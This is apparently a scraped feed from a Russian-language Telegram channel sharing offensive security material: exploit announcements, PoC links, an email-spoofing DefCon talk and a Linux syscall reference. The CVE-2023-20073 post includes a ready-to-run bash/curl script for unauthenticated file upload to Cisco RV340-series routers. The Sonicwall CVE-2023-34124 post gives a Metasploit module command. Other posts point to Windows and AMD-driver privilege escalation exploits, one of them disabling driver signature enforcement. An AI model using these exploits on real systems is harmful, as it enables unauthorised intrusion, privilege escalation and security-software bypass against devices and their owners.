DllNotificationInection
Используя концепцию обратных вызовов уведомлений DLL в локальных и удаленных процессах можно вызвать Calc )
*
WriteUp "must have"
*
POC
Используя концепцию обратных вызовов уведомлений DLL в локальных и удаленных процессах можно вызвать Calc )
*
WriteUp "must have"
*
POC
👍10😱6
Если нужно быстро сориентироваться по системным вызовам ядра Linux.
Числа и параметры для различных архитектур и версий ядра.
https://syscalls.mebeim.net
#linux #syscalls #arch
Числа и параметры для различных архитектур и версий ядра.
https://syscalls.mebeim.net
#linux #syscalls #arch
🔥19👍4
Proxy Bar
Продолжаем публиковать материалы с DefCon 31 SpamChannel Подделка писем с любого домена с помощью MailChannels (+2 миллиона доменов) Упор как всегда на DNS записи SPF и DMARC Пыщь/download
YouTube
SpamChannel: Impersonating Satan
This video demonstrates spoofing an email as Satan from churchofsatan.com using a Cloudflare Worker & MailChannels.
This was one of the demos in my Defcon 31 talk noscriptd "SpamChannel: Spoofing Emails From 2 Million+ Domains and Virtually Becoming Satan"…
This was one of the demos in my Defcon 31 talk noscriptd "SpamChannel: Spoofing Emails From 2 Million+ Domains and Virtually Becoming Satan"…
👍8
This media is not supported in your browser
VIEW IN TELEGRAM
Я календарь переверну
И снова RATник в сентябре
И снова RATник в сентябре
🔥22👍6😱2
CVE-2023-20073
Загрузка произвольного файла без проверки подлинности (XSS) в VPN-маршрутизаторах:
Cisco RV340, RV340W, RV345, RV345P
Usage:
Загрузка произвольного файла без проверки подлинности (XSS) в VPN-маршрутизаторах:
Cisco RV340, RV340W, RV345, RV345P
Usage:
#!/usr/bin/bash
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><noscript>alert('JS-test')</noscript>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"
#cisco👍14
CVE-2023-36874
уязвимость в службе отчетов об ошибках, связанная с повышением привилегий, позволявшая получить права администратора на устройстве Windows.
*
POC exploit
*
Read - exploit for 0-day Windows Error Reporting Service bug
#windows #lpe
уязвимость в службе отчетов об ошибках, связанная с повышением привилегий, позволявшая получить права администратора на устройстве Windows.
*
POC exploit
*
Read - exploit for 0-day Windows Error Reporting Service bug
#windows #lpe
🔥9👍2
HITCON 2023
Демонстрация использования
*
Exploit
#AMD
Демонстрация использования
AMDCpuProfiler.sys в AMD. Запуская произвольную запись токена EPROCESS, достигается повышение привилегий до уровня SYSTEM. Отключение флага DSE позволяет загружать вредоносный неподписанный драйвер. В презентации также демонстрируется атака на 360 Total Security путем аннулирования его ObRegisterCallbacks, что позволяет выполнять вредоносные действия в процессах 360 Total Security.*
Exploit
#AMD
🔥7👍1
Sonicwall rce CVE-2023-34124
*
metasploit
*
Эксплойт объединяет 4-5 различных уязвимостей. Благодаря @fulmetalpackets
*
metasploit
*
use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124ну да ну да 🙃
Эксплойт объединяет 4-5 различных уязвимостей. Благодаря @fulmetalpackets
🔥5👍2